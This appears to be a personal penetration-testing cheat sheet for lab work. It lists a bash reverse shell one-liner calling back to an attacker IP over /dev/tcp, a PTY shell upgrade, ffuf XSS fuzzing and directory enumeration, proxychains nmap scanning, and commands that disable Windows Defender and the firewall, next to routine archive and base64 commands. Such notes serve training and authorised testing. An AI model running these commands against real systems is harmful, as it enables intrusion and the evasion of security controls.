(constantly under construction)

Python interactive shell

  1. python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

Linux Reverse Shell in one line

  1. /bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.74/443 0>&1’

File Extraction

  1. tar ball: tar -xvf <filename.tar.gz or just .tar> -C <target file>
  2. zip: unzip -q <filename.zip> -d </path/to/dir>

File Compression

  1. tar ball: tar -czvf archive.tar file1 file2
  2. zip: zip -q <archivename.zip> file1 file2 file3

Base64 encode and decode

  1. Directly at the command line
    • echo -n “plaintext” | base64
    • echo -n “base64 encoded” | base64 –decode
  2. From the text file when it contains special characters
    • base64 input.txt
    • base64 input.txt –decode

FFUF FFUZ

The general flags

  • Use keyword FUZZ to the field where you want to fuzz or enumerate.
  • -w, to specify the wordlist
  • -X POST, to specify the HTTP method
  • -d, to specify the data
  • -H, to specify the header value.
  • -mc all -ac, to show all the response and exclude those specified.
    • -ac 404,502, to exclude status code 404 and 502
  • -fs, exclude size with the provided number, separate with a comma
  • -fw exclude words with the provided number, separate with a comma
  • -e, adding the extension
  1. XXS fuzz with POST request
    • ffuf -w /usr/share/wordlists/seclists/Fuzzing/XSS/human-friendly/XSS-BruteLogic.txt -u http://10.129.232.215:5000/support -X POST -d "fname=123&lname=123&email=hello%40123.com&phone=123&message=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -mc all -ac
  2. directory enumeration
    • ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.129.232.215:5000/FUZZ -mc all -ac

Nmap Proxychains scan

  1. sudo proxychains nmap -sT –top-port=20 -Pn 172.16.x.194

Disable AV and Firewall

  1. powershell -c “Set-MpPreference -DisableRealtimeMonitoring $true” & netsh advfirewall set allprofiles state off
  2. Set-MpPreference -DisableRealtimeMonitoring $true & netsh advfirewall set allprofiles state off